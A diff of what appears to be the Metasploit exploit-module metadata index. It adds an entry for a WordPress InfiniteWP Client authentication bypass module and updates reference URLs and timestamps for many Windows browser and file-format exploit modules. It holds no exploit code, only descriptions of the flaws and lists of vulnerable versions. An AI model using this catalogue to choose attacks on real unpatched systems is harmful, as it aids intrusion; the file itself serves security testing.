     "ref_name": "unix/webapp/joomla_media_upload_exec",
@@ -91424,6 +91488,58 @@
     },
     "needs_cleanup": true
   },
+  "exploit_unix/webapp/wp_infinitewp_auth_bypass": {
+    "name": "WordPress InfiniteWP Client Authentication Bypass",
+    "fullname": "exploit/unix/webapp/wp_infinitewp_auth_bypass",
+    "aliases": [
+
+    ],
+    "rank": 0,
+    "disclosure_date": "2020-01-14",
+    "type": "exploit",
+    "author": [
+      "WebARX",
+      "wvu <wvu@metasploit.com>"
+    ],
+    "description": "This module exploits an authentication bypass in the WordPress\n        InfiniteWP Client plugin to log in as an administrator and execute\n        arbitrary PHP code by overwriting the file specified by PLUGIN_FILE.\n\n        The module will attempt to retrieve the original PLUGIN_FILE contents\n        and restore them after payload execution. If VerifyContents is set,\n        which is the default setting, the module will check to see if the\n        restored contents match the original.\n\n        Note that a valid administrator username is required for this module.\n\n        WordPress >= 4.9 is currently not supported due to a breaking WordPress\n        API change. Tested against 4.8.3.",
+    "references": [
+      "WPVDB-10011",
+      "URL-https://www.webarxsecurity.com/vulnerability-infinitewp-client-wp-time-capsule/",
+      "URL-https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/",
+      "URL-https://blog.sucuri.net/2020/01/authentication-bypass-vulnerability-in-infinitewp-client.html"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "InfiniteWP Client < 1.9.4.5"
+    ],
+    "mod_time": "2020-02-07 12:12:35 +0000",
+    "path": "/modules/exploits/unix/webapp/wp_infinitewp_auth_bypass.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/wp_infinitewp_auth_bypass",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/webapp/wp_infusionsoft_upload": {
     "name": "Wordpress InfusionSoft Upload Vulnerability",
     "fullname": "exploit/unix/webapp/wp_infusionsoft_upload",
@@ -94599,7 +94715,7 @@
       "URL-http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/",
       "URL-https://developer.apple.com/fonts/TTRefMan/RM06/Chap6.html",
       "URL-http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit",
+      "URL-https://blog.rapid7.com/2012/08/17/adobe-flash-player-exploit-cve-2012-1535-now-available-for-metasploit",
       "URL-http://www.adobe.com/support/security/bulletins/apsb12-18.html"
     ],
     "platform": "Windows",
@@ -94620,7 +94736,7 @@
       "IE 8 on Windows 7 SP1",
       "IE 9 on Windows 7 SP1"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/adobe_flash_otf_font.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/adobe_flash_otf_font",
@@ -94741,7 +94857,7 @@
       "BID-53395",
       "URL-http://www.adobe.com/support/security/bulletins/apsb12-09.html",
       "URL-http://contagiodump.blogspot.com.es/2012/05/may-3-cve-2012-0779-world-uyghur.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability"
+      "URL-https://blog.rapid7.com/2012/06/22/the-secret-sauce-to-cve-2012-0779-adobe-flash-object-confusion-vulnerability"
     ],
     "platform": "Windows",
     "arch": "",
@@ -94758,7 +94874,7 @@
       "IE 7 on Windows XP SP3",
       "IE 8 on Windows XP SP3 with msvcrt ROP"
     ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/adobe_flash_rtmp.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/adobe_flash_rtmp",
@@ -96807,7 +96923,7 @@
       "OSVDB-81443",
       "ZDI-12-113",
       "URL-http://www-304.ibm.com/support/docview.wss?uid=swg21591705",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/07/11/it-isnt-always-about-buffer-overflow"
+      "URL-https://blog.rapid7.com/2012/07/11/it-isnt-always-about-buffer-overflow"
     ],
     "platform": "Windows",
     "arch": "",
@@ -96822,7 +96938,7 @@
       "Automatic",
       "IE 6 / IE7 (No DEP)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/clear_quest_cqole.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/clear_quest_cqole",
@@ -97531,7 +97647,7 @@
       "CVE-2013-0108",
       "OSVDB-90583",
       "BID-58134",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/03/11/cve-2013-0108-honeywell-ebi",
+      "URL-https://blog.rapid7.com/2013/03/11/cve-2013-0108-honeywell-ebi",
       "URL-http://ics-cert.us-cert.gov/pdf/ICSA-13-053-02.pdf"
     ],
     "platform": "Windows",
@@ -97546,7 +97662,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2019-08-02 09:48:53 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/honeywell_hscremotedeploy_exec",
@@ -98203,7 +98319,7 @@
       "URL-http://technet.microsoft.com/en-us/security/advisory/2794220",
       "URL-http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx",
       "URL-http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012"
+      "URL-https://blog.rapid7.com/2012/12/29/microsoft-internet-explorer-0-day-marks-the-end-of-2012"
     ],
     "platform": "Windows",
     "arch": "",
@@ -98221,7 +98337,7 @@
       "IE 8 on Windows Server 2003",
       "IE 8 on Windows 7"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 09:26:29 +0000",
     "path": "/modules/exploits/windows/browser/ie_cbutton_uaf.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/ie_cbutton_uaf",
@@ -98455,7 +98571,7 @@
       "MSB-MS13-080",
       "URL-http://technet.microsoft.com/en-us/security/advisory/2887505",
       "URL-http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free"
+      "URL-https://blog.rapid7.com/2013/09/30/metasploit-releases-cve-2013-3893-ie-setmousecapture-use-after-free"
     ],
     "platform": "Windows",
     "arch": "",
@@ -98471,7 +98587,7 @@
       "Windows 7 with Office 2007|2010",
       "Windows XP with IE 8"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/ie_setmousecapture_uaf.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/ie_setmousecapture_uaf",
@@ -101473,7 +101589,7 @@
       "OSVDB-82865",
       "URL-http://labs.alienvault.com/labs/index.php/2012/ongoing-attacks-exploiting-cve-2012-1875/",
       "URL-https://twitter.com/binjo/status/212795802974830592",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
+      "URL-https://blog.rapid7.com/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
     ],
     "platform": "Windows",
     "arch": "",
@@ -101490,7 +101606,7 @@
       "IE 8 on Windows XP SP3 with JRE ROP",
       "IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP"
     ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/ms12_037_same_id.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/ms12_037_same_id",
@@ -102152,7 +102268,7 @@
       "MSB-MS12-043",
       "URL-http://technet.microsoft.com/en-us/security/advisory/2719615",
       "URL-http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
+      "URL-https://blog.rapid7.com/2012/06/18/metasploit-exploits-critical-microsoft-vulnerabilities"
     ],
     "platform": "Windows",
     "arch": "",
@@ -102172,7 +102288,7 @@
       "IE 8 with Java 6 on Windows 7 SP1/Vista SP2",
       "IE 9 with Java 6 on Windows 7 SP1"
     ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/msxml_get_definition_code_exec",
@@ -102818,7 +102934,7 @@
       "OSVDB-81439",
       "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-12-05",
       "URL-http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html",
-      "URL-https://community.rapid7.com/community/metasploit/blog/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549"
+      "URL-https://blog.rapid7.com/2012/08/15/the-stack-cookies-bypass-on-cve-2012-0549"
     ],
     "platform": "Windows",
     "arch": "",
@@ -102836,7 +102952,7 @@
       "IE 8 with Java 6 on Windows XP SP3/7 SP1/Vista SP2",
       "IE 9 with Java 6 on Windows 7 SP1"
     ],
-    "mod_time": "2017-10-05 16:44:36 +0000",
+    "mod_time": "2020-02-18 08:58:30 +0000",
     "path": "/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb",
     "is_install_path": true,
     "ref_name": "windows/browser/oracle_autovue_setmarkupmode",
@@ -105720,7 +105836,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/a_pdf_wav_to_mp3",
@@ -105803,7 +105919,7 @@
     "targets": [
       "ACDSee FotoSlate 4.0 Build 146"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/acdsee_fotoslate_string",
@@ -105844,7 +105960,7 @@
     "targets": [
       "ACDSee 9.0 (Build 1008)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/acdsee_xpm.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/acdsee_xpm",
@@ -105927,7 +106043,7 @@
     "targets": [
       "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/activepdf_webgrabber.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/activepdf_webgrabber",
@@ -105968,7 +106084,7 @@
     "targets": [
       "Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_collectemailinfo",
@@ -106012,7 +106128,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_cooltype_sing",
@@ -106058,7 +106174,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_flashplayer_button",
@@ -106102,7 +106218,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_flashplayer_newfunction",
@@ -106146,7 +106262,7 @@
     "targets": [
       "Adobe Reader Windows Universal (JS Heap Spray)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_flatedecode_predictor02",
@@ -106189,7 +106305,7 @@
     "targets": [
       "Adobe Reader Universal (JS Heap Spray)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_geticon.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_geticon",
@@ -106232,7 +106348,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_illustrator_v14_eps",
@@ -106277,7 +106393,7 @@
       "Adobe Reader v9.0.0 (Windows XP SP3 English)",
       "Adobe Reader v8.1.2 (Windows XP SP2 English)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_jbig2decode.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_jbig2decode",
@@ -106323,7 +106439,7 @@
     "targets": [
       "Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_libtiff.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_libtiff",
@@ -106368,7 +106484,7 @@
       "Adobe Reader Windows English (JS Heap Spray)",
       "Adobe Reader Windows German (JS Heap Spray)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_media_newplayer.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_media_newplayer",
@@ -106505,7 +106621,7 @@
     "targets": [
       "Adobe Reader 9.4.0 / 9.4.5 / 9.4.6 on Win XP SP3"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_reader_u3d.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_reader_u3d",
@@ -106593,7 +106709,7 @@
     "targets": [
       "Adobe Reader Windows Universal (JS Heap Spray)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_u3d_meshdecl",
@@ -106634,7 +106750,7 @@
     "targets": [
       "Adobe Reader v8.1.2 (Windows XP SP3 English)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/adobe_utilprintf.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/adobe_utilprintf",
@@ -106725,7 +106841,7 @@
     "targets": [
       "Universal Salamander 2.5"
     ],
-    "mod_time": "2017-11-09 03:00:24 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/altap_salamander_pdb.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/altap_salamander_pdb",
@@ -106812,7 +106928,7 @@
     "targets": [
       "Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/aol_phobos_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/aol_phobos_bof",
@@ -106855,7 +106971,7 @@
     "targets": [
       "Windows XP SP3 with DEP bypass"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/apple_quicktime_pnsize.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/apple_quicktime_pnsize",
@@ -107033,7 +107149,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/audio_wkstn_pls.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/audio_wkstn_pls",
@@ -107223,7 +107339,7 @@
       "metacom",
       "wvu <wvu@metasploit.com>"
     ],
-    "description": "This module exploits a stack-based buffer overflow on Beetel Connection Manager. The\n        vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini\n        file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP\n        SP3 and Windows 7 SP1.",
+    "description": "This module exploits a stack-based buffer overflow in Beetel Connection\n        Manager. The vulnerability exists in the parsing of the UserName\n        parameter in the NetConfig.ini file.\n\n        The module has been tested successfully against version\n        PCW_BTLINDV1.0.0B04 on Windows XP SP3 and Windows 7 SP1.",
     "references": [
       "OSVDB-98714",
       "EDB-28969"
@@ -107240,7 +107356,7 @@
     "targets": [
       "PCW_BTLINDV1.0.0B04 (WinXP SP3, Win7 SP1)"
     ],
-    "mod_time": "2018-11-16 12:18:28 +0000",
+    "mod_time": "2020-02-04 10:05:41 +0000",
     "path": "/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/beetel_netconfig_ini_bof",
@@ -107502,7 +107618,7 @@
     "targets": [
       "Windows 2000 All / Windows XP SP0/SP1 (CA eTrust Antivirus 8.1.637)"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/ca_cab.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/ca_cab",
@@ -107587,7 +107703,7 @@
     "targets": [
       "CCMPlayer 1.5"
     ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/ccmplayer_m3u_bof",
@@ -107900,7 +108016,7 @@
       "CyberLink LabelPrint <= 2.5 on Windows 8.1 x64",
       "CyberLink LabelPrint <= 2.5 on Windows 10 x64 build 1803"
     ],
-    "mod_time": "2018-12-11 07:55:20 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/cyberlink_lpp_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/cyberlink_lpp_bof",
@@ -107986,7 +108102,7 @@
     "targets": [
       "Cytel Studio 9.0"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/cytel_studio_cy3.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/cytel_studio_cy3",
@@ -108199,7 +108315,7 @@
     "targets": [
       "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/djvu_imageurl.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/djvu_imageurl",
@@ -108238,7 +108354,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2018-02-01 10:05:50 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/dupscout_xml.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/dupscout_xml",
@@ -108369,7 +108485,7 @@
     "targets": [
       "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
     ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/emc_appextender_keyworks.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/emc_appextender_keyworks",
@@ -108628,7 +108744,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/fatplayer_wav.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/fatplayer_wav",
@@ -108674,7 +108790,7 @@
     "targets": [
       "Free Download Manager 3.0 (Build 844)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/fdm_torrent.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/fdm_torrent",
@@ -108720,7 +108836,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/feeddemon_opml.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/feeddemon_opml",
@@ -108763,7 +108879,7 @@
       "Foxit PDF Reader v4.2 (Windows XP SP0-SP3)",
       "Foxit PDF Reader v4.2 (Windows Vista/7/8/2008)"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/foxit_reader_filewrite",
@@ -108806,7 +108922,7 @@
     "targets": [
       "Foxit Reader 3.0 Windows XP SP2"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/foxit_reader_launch.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/foxit_reader_launch",
@@ -108942,7 +109058,7 @@
     "targets": [
       "Windows XP SP3 EN"
     ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/free_mp3_ripper_wav",
@@ -108983,7 +109099,7 @@
     "targets": [
       "Windows XP Universal"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/galan_fileformat_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/galan_fileformat_bof",
@@ -109109,7 +109225,7 @@
     "targets": [
       "Windows XP English SP3"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/hhw_hhp_compiledfile_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/hhw_hhp_compiledfile_bof",
@@ -109152,7 +109268,7 @@
     "targets": [
       "Windows XP English SP3"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/hhw_hhp_contentfile_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/hhw_hhp_contentfile_bof",
@@ -109197,7 +109313,7 @@
     "targets": [
       "Windows XP English SP3"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/hhw_hhp_indexfile_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/hhw_hhp_indexfile_bof",
@@ -109459,7 +109575,7 @@
       "IDEAL Migration <= 4.5.1 on Windows XP",
       "IDEAL Administration <= 10.5 on Windows XP"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/ideal_migration_ipj.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/ideal_migration_ipj",
@@ -109801,7 +109917,7 @@
     "targets": [
       "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/mcafee_hercules_deletesnapshot.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/mcafee_hercules_deletesnapshot",
@@ -109843,7 +109959,7 @@
     "targets": [
       "Internet Explorer"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/mcafee_showreport_exec.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/mcafee_showreport_exec",
@@ -109928,7 +110044,7 @@
       "Windows XP SP3 - English",
       "Windows XP SP2 - English"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/mediajukebox.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/mediajukebox",
@@ -109969,7 +110085,7 @@
     "targets": [
       "Windows XP SP3 / Vista / 7"
     ],
-    "mod_time": "2018-07-08 18:46:04 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/microp_mppl.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/microp_mppl",
@@ -110054,7 +110170,7 @@
     "targets": [
       "Windows Universal"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/millenium_mp3_pls.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/millenium_mp3_pls",
@@ -110098,7 +110214,7 @@
     "targets": [
       "Mini-stream RM-MP3 Converter v3.1.2.1.2010.03.30"
     ],
-    "mod_time": "2018-07-09 13:22:08 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/mini_stream_pls_bof",
@@ -110221,7 +110337,7 @@
     "targets": [
       "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/moxa_mediadbplayback.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/moxa_mediadbplayback",
@@ -110305,7 +110421,7 @@
     "targets": [
       "SMPlayer 0.6.8 / mplayer.exe Sherpya-SVN-r29355-4.5.0 / Windows XP English SP3"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/mplayer_sami_bof.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/mplayer_sami_bof",
@@ -110354,7 +110470,7 @@
       "Microsoft Office 2007 SP2 English on Windows XP SP3 English",
       "Crash Target for Debugging"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/ms09_067_excel_featheader.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/ms09_067_excel_featheader",
@@ -110401,7 +110517,7 @@
       "Microsoft PowerPoint Viewer 2003 (kb969615)",
       "Crash Target for Debugging"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
     "path": "/modules/exploits/windows/fileformat/ms10_004_textbytesatom.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/ms10_004_textbytesatom",
@@ -110447,7 +110563,7 @@
       "Microsoft Office Excel 2002 10.2614.2625 Service Pack 0(Office XP) on Windows XP SP3",
       "Microsoft Office Excel 2002 10.6501.6626 Service Pack 3 (Office XP SP3) on Windows XP SP3"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2020-01-14 20:47:27 +0000",
